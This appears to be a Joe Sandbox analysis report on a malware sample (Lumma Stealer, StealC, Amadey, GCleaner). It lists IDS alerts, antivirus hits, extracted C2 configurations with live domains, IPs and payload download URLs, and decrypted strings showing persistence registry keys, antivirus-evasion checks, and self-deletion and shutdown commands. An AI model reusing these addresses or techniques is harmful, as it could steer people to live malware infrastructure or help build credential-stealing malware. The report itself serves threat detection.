ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dsfljsdfjewf .info)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-01T16:26:40.902453+0100	2060206	1	Domain Observed Used for C2 Detected	192.168.2.6	52752	1.1.1.1	53	UDP
2025-03-01T16:29:29.561240+0100	2060206	1	Domain Observed Used for C2 Detected	192.168.2.6	55188	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (exarthynature .run)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-01T16:26:32.261031+0100	2060385	1	Domain Observed Used for C2 Detected	192.168.2.6	49615	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hobbyedsmoker .live)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-01T16:26:40.889287+0100	2060334	1	Domain Observed Used for C2 Detected	192.168.2.6	49910	1.1.1.1	53	UDP
2025-03-01T16:29:29.547195+0100	2060334	1	Domain Observed Used for C2 Detected	192.168.2.6	54411	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pastedeputten .life)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-01T16:26:40.984701+0100	2060338	1	Domain Observed Used for C2 Detected	192.168.2.6	61672	1.1.1.1	53	UDP
2025-03-01T16:29:29.622426+0100	2060338	1	Domain Observed Used for C2 Detected	192.168.2.6	53906	1.1.1.1	53	UDP
2025-03-01T16:29:29.657502+0100	2060338	1	Domain Observed Used for C2 Detected	192.168.2.6	53906	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (privileggoe .live)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-01T16:26:40.966558+0100	2060307	1	Domain Observed Used for C2 Detected	192.168.2.6	56729	1.1.1.1	53	UDP
2025-03-01T16:29:29.607846+0100	2060307	1	Domain Observed Used for C2 Detected	192.168.2.6	55986	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (subawhipnator .life)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-01T16:26:40.945397+0100	2060313	1	Domain Observed Used for C2 Detected	192.168.2.6	54737	1.1.1.1	53	UDP
2025-03-01T16:29:29.597068+0100	2060313	1	Domain Observed Used for C2 Detected	192.168.2.6	63580	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (uncertainyelemz .bet)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-01T16:26:40.877483+0100	2060315	1	Domain Observed Used for C2 Detected	192.168.2.6	61055	1.1.1.1	53	UDP
2025-03-01T16:29:29.536457+0100	2060315	1	Domain Observed Used for C2 Detected	192.168.2.6	65259	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-01T16:26:35.451135+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	49757	104.21.96.1	443	TCP
2025-03-01T16:26:46.179663+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	49830	188.114.97.3	443	TCP
2025-03-01T16:26:57.274558+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	49912	172.67.200.156	443	TCP
2025-03-01T16:27:30.396354+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50039	188.114.97.3	443	TCP
2025-03-01T16:28:20.054037+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50125	188.114.97.3	443	TCP
2025-03-01T16:28:59.404391+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50191	104.21.96.1	443	TCP
2025-03-01T16:29:45.795681+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50225	188.114.97.3	443	TCP
2025-03-01T16:29:54.120041+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50252	172.67.200.156	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-01T16:27:22.976838+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	50033	45.93.20.28	80	TCP
2025-03-01T16:27:38.519955+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	50056	45.93.20.28	80	TCP
2025-03-01T16:28:26.241921+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	50135	45.93.20.28	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-01T16:26:26.523758+0100	2856147	1	A Network Trojan was detected	192.168.2.6	49712	176.113.115.6	80	TCP
2025-03-01T16:27:49.830579+0100	2856147	1	A Network Trojan was detected	192.168.2.6	50078	176.113.115.6	80	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-01T16:26:31.073648+0100	2803305	3	Unknown Traffic	192.168.2.6	49720	176.113.115.7	80	TCP
2025-03-01T16:26:36.811807+0100	2803305	3	Unknown Traffic	192.168.2.6	49766	176.113.115.7	80	TCP
2025-03-01T16:26:44.547074+0100	2803305	3	Unknown Traffic	192.168.2.6	49824	176.113.115.7	80	TCP
2025-03-01T16:26:51.514676+0100	2803305	3	Unknown Traffic	192.168.2.6	49877	176.113.115.7	80	TCP
2025-03-01T16:27:00.866324+0100	2803305	3	Unknown Traffic	192.168.2.6	49942	176.113.115.7	80	TCP
2025-03-01T16:27:09.405573+0100	2803305	3	Unknown Traffic	192.168.2.6	49998	176.113.115.7	80	TCP
2025-03-01T16:27:17.404306+0100	2803305	3	Unknown Traffic	192.168.2.6	50027	176.113.115.7	80	TCP
2025-03-01T16:27:24.453825+0100	2803305	3	Unknown Traffic	192.168.2.6	50035	176.113.115.7	80	TCP
2025-03-01T16:27:31.047440+0100	2803305	3	Unknown Traffic	192.168.2.6	50040	176.113.115.7	80	TCP
2025-03-01T16:27:37.870144+0100	2803305	3	Unknown Traffic	192.168.2.6	50055	176.113.115.7	80	TCP
2025-03-01T16:27:44.300271+0100	2803305	3	Unknown Traffic	192.168.2.6	50070	176.113.115.7	80	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-01T16:27:42.542703+0100	2843864	1	A Network Trojan was detected	192.168.2.6	50066	188.114.97.3	443	TCP
2025-03-01T16:28:24.527724+0100	2843864	1	A Network Trojan was detected	192.168.2.6	50132	188.114.97.3	443	TCP
2025-03-01T16:29:50.829457+0100	2843864	1	A Network Trojan was detected	192.168.2.6	50249	188.114.97.3	443	TCP
2025-03-01T16:29:56.350675+0100	2843864	1	A Network Trojan was detected	192.168.2.6	50257	172.67.200.156	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://techpxioneers.run/rd	Avira URL Cloud: Label: malware
Source: http://185.156.73.73/success?substr=mixtwo&s=three&sub=non$	Avira URL Cloud: Label: malware
Source: https://techpxioneers.run/apiY	Avira URL Cloud: Label: malware
Source: https://dawtastream.bet/er	Avira URL Cloud: Label: malware
Source: https://dawtastream.bet/	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/fate/random.exe	Avira URL Cloud: Label: malware
Source: https://circujitstorm.bet/apie	Avira URL Cloud: Label: malware
Source: https://dawtastream.bet/.	Avira URL Cloud: Label: malware
Source: https://circujitstorm.bet:443/apil	Avira URL Cloud: Label: malware
Source: https://circujitstorm.bet/apif	Avira URL Cloud: Label: malware
Source: https://circujitstorm.bet/apiT	Avira URL Cloud: Label: malware
Source: https://circujitstorm.bet/apiW	Avira URL Cloud: Label: malware
Source: http://176.113.115.6/Ni9kiput/index.php	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/bonus_max/random.exe	Avira URL Cloud: Label: malware
Source: https://techpxioneers.run/apir	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1314794
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe	Avira: detection malicious, Label: HEUR/AGEN.1314794
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: random.exe	Malware Configuration Extractor: Amadey {"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
Source: 00000004.00000002.2280248529.0000000003529000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: LummaC {"C2 url": ["exarthynature.run", "uncertainyelemz.bet", "hobbyedsmoker.live", "presentymusse.world", "deaddereaste.today", "subawhipnator.life", "privileggoe.live", "boltetuurked.digital"], "Build id": "FATE99--test"}
Source: 15.2.dbe8776a6a.exe.de84000.2.raw.unpack	Malware Configuration Extractor: GCleaner {"C2 addresses": ["185.156.73.73", "45.91.200.135"]}
Source: 43a79b4335.exe.3656.19.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "http://45.93.20.28/85a1cacf11314eb8.php", "Botnet": "trump"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe	ReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\soft[1]	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	ReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Local\Temp\O5B9GD1ATV6RLTMC0ANGDNKXPTNV.exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\VF4D5GDAK1f2ev\Y-Cleaner.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	ReversingLabs: Detection: 78%

Multi AV Scanner detection for submitted file

Source: random.exe	Virustotal: Detection: 79%			Perma Link
Source: random.exe	ReversingLabs: Detection: 78%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000004.00000002.2280248529.0000000003529000.00000004.00000800.00020000.00000000.sdmp	String decryptor: exarthynature.run
Source: 00000004.00000002.2280248529.0000000003529000.00000004.00000800.00020000.00000000.sdmp	String decryptor: uncertainyelemz.bet
Source: 00000004.00000002.2280248529.0000000003529000.00000004.00000800.00020000.00000000.sdmp	String decryptor: hobbyedsmoker.live
Source: 00000004.00000002.2280248529.0000000003529000.00000004.00000800.00020000.00000000.sdmp	String decryptor: presentymusse.world
Source: 00000004.00000002.2280248529.0000000003529000.00000004.00000800.00020000.00000000.sdmp	String decryptor: deaddereaste.today
Source: 00000004.00000002.2280248529.0000000003529000.00000004.00000800.00020000.00000000.sdmp	String decryptor: subawhipnator.life
Source: 00000004.00000002.2280248529.0000000003529000.00000004.00000800.00020000.00000000.sdmp	String decryptor: privileggoe.live
Source: 00000004.00000002.2280248529.0000000003529000.00000004.00000800.00020000.00000000.sdmp	String decryptor: boltetuurked.digital
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 176.113.115.6
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: /Ni9kiput/index.php
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: S-%lu-
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: bb556cff4a
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: rapes.exe
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Startup
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: rundll32
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Programs
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: %USERPROFILE%
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: cred.dll
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: clip.dll
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: http://
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: https://
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: /quiet
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: /Plugins/
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: &unit=
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: shell32.dll
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: kernel32.dll
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ProgramData\
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: AVAST Software
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Kaspersky Lab
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Panda Security
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Doctor Web
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 360TotalSecurity
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Bitdefender
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Norton
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Sophos
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Comodo
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: WinDefender
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 0123456789
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ------
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ?scr=1
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ComputerName
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: -unicode-
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: VideoID
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ProductName
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: CurrentBuild
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: rundll32.exe
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: "taskkill /f /im "
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: " && timeout 1 && del
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: && Exit"
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: " && ren
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Powershell.exe
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: shutdown -s -t 0
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: random
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Keyboard Layout\Preload
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 00000419
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 00000422
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 00000423
Source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 0000043f

Phishing

Yara detected obfuscated html page

Source: Yara match

File source: C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta, type: DROPPED

Source: random.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.67.133.187:443 -> 192.168.2.6:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49856 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49899 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:49912 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:49923 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:49932 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:49949 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:49957 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:49999 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50024 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50026 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50028 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50029 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50031 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50034 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50036 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50037 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50039 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50041 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50042 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50048 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50052 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50057 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50066 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50074 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50096 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50099 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50121 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50122 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50124 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50125 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50128 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50130 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50132 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50133 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50157 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50162 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:50186 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:50188 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:50189 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:50191 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:50192 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50197 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50204 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50203 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50202 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50223 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50224 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50225 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:50227 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:50228 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50242 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50243 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:50246 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50245 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:50247 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50249 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50250 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:50252 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:50254 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:50257 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:50258 version: TLS 1.2

Source: random.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\users\source\repos\Brought\Brought\obj\Release\Brought.pdbL6f6 X6_CorExeMainmscoree.dll source: 9f19f13091.exe, 00000004.00000002.2280248529.0000000003529000.00000004.00000800.00020000.00000000.sdmp, 9f19f13091.exe, 00000004.00000000.2228824211.0000000000032000.00000002.00000001.01000000.0000000A.sdmp
